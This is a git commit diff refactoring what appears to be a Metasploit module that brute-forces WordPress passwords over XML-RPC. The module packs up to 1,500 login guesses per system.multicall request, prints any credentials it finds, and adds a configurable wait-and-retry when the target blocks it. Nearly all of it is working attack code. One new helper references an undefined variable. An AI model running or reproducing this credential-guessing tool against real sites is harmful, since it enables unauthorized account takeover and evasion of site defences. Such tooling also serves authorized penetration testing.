Refactoring..

bug/bundler_fix
KINGSABRI 2015-11-10 22:33:37 +03:00
parent 46e7c53950
commit fffbb4106f
1 changed files with 72 additions and 75 deletions

View File

@ -17,8 +17,8 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'Author' =>
[
'William (WCoppola@Lares.com)',
'Sabri (@KINGSABRI)'
'Sabri (@KINGSABRI)', # Module Writer
'William (WCoppola@Lares.com)' # Module Requester
],
'References' =>
[
@ -31,8 +31,9 @@ class Metasploit3 < Msf::Auxiliary
[
OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line',
File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
OptPath.new('WPPASS_FILE', [ true, 'File containing passwords, one per line',
File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")])
OptPath.new('WPPASS_FILE', [true, 'File containing passwords, one per line',
File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")]),
OptInt.new('BLOCKEDWAIT', [true, 'Time(minutes) to wait if got blocked', 6])
], self.class)
@ -51,72 +52,70 @@ class Metasploit3 < Msf::Auxiliary
File.readlines(datastore['WPPASS_FILE']).map {|pass| pass.chomp}
end
def generate_xml user
def generate_xml(user)
print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
vprint_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
xml_payloads = [] # Container for all generated XMLs
xml = ""
# Evil XML | Limit number of log-ins to 1700/request for wordpress limitation
passwords.each_slice(1500) do |pass_group|
xml = "<?xml version=\"1.0\"?>\n"
xml << "<methodCall>\n"
xml << "<methodName>system.multicall</methodName>\n"
xml << "<params>\n"
xml << " <param><value><array><data>\n"
document = Nokogiri::XML::Builder.new do |xml|
xml.methodCall {
xml.methodName("system.multicall")
xml.params {
xml.param {
xml.value {
xml.array {
xml.data {
pass_group.each do |pass|
xml << " <value><struct>\n"
xml << " <member>\n"
xml << " <name>methodName</name>\n"
xml << " <value><string>wp.getUsersBlogs</string></value>\n"
xml << " </member>\n"
xml << " <member>\n"
xml << " <name>params</name><value><array><data>\n"
xml << " <value><array><data>\n"
xml << " <value><string>#{user}</string></value>\n"
xml << " <value><string>#{pass}</string></value>\n"
xml << " </data></array></value>\n"
xml << " </data></array></value>\n"
xml << " </member>\n"
xml << " </struct></value>\n"
end
xml << " </data></array></value></param>\n"
xml << "</params>\n"
xml << "</methodCall>"
xml_payloads << xml
xml.value {
xml.struct {
xml.member {
xml.name("methodName")
xml.value { xml.string("wp.getUsersBlogs") }}
xml.member {
xml.name("params")
xml.value {
xml.array {
xml.data {
xml.value {
xml.array {
xml.data {
xml.value { xml.string(user) }
xml.value { xml.string(pass) }
}}}}}}}}}
end
print_status('Generating XMLs just done.')
return xml_payloads
}}}}}}
end
xml_payloads << document.to_xml
end
vprint_status('Generating XMLs just done.')
xml_payloads
end
#
# Check target status
#
def check_wpstatus
print_status("Checking #{peer} status!")
case
when !wordpress_and_online?
if !wordpress_and_online?
print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress or you got blocked!")
:abort
when !wordpress_xmlrpc_enabled?
return
elsif !wordpress_xmlrpc_enabled?
print_error("#{rhost}:#{rport}#{target_uri} does not enable XMLRPC")
:abort
return
else
print_status("Target #{peer} is running Wordpress")
end
end
def parse_response(res)
resp.scan(/Incorrect username or password/)
end
def run
check_wpstatus
@ -151,20 +150,18 @@ class Metasploit3 < Msf::Auxiliary
# If this gives exception then its the correct password
value.struct.member[1].value.string.text
rescue
user = req_xml.document.methodCall.params.param.value.array.data.value[i].struct.member[1].value.array.data.value.array.data.value[0].text
pass = req_xml.document.methodCall.params.param.value.array.data.value[i].struct.member[1].value.array.data.value.array.data.value[1].text
user = req_xml.document.methodCall.params.param.value.array.data.value[i].struct.member[1].value.array.data.value.array.data.value[0].text.strip
pass = req_xml.document.methodCall.params.param.value.array.data.value[i].struct.member[1].value.array.data.value.array.data.value[1].text.strip
print_good("Credentials Found! #{user}:#{pass}")
passfound = true
end end
rescue NoMethodError
print_error("It seems you got blocked!")
print_warning("I'll sleep for 6 minutes then I'll try again. CTR+C to exit")
sleep 6 * 60
print_error('It seems you got blocked!')
print_warning("I'll sleep for #{datastore['BLOCKEDWAIT']} minutes then I'll try again. CTR+C to exit")
sleep datastore['BLOCKEDWAIT'] * 60
retry
# return :abort
end
print_status('Taking a nap for 2 seconds..')
sleep 2
end end end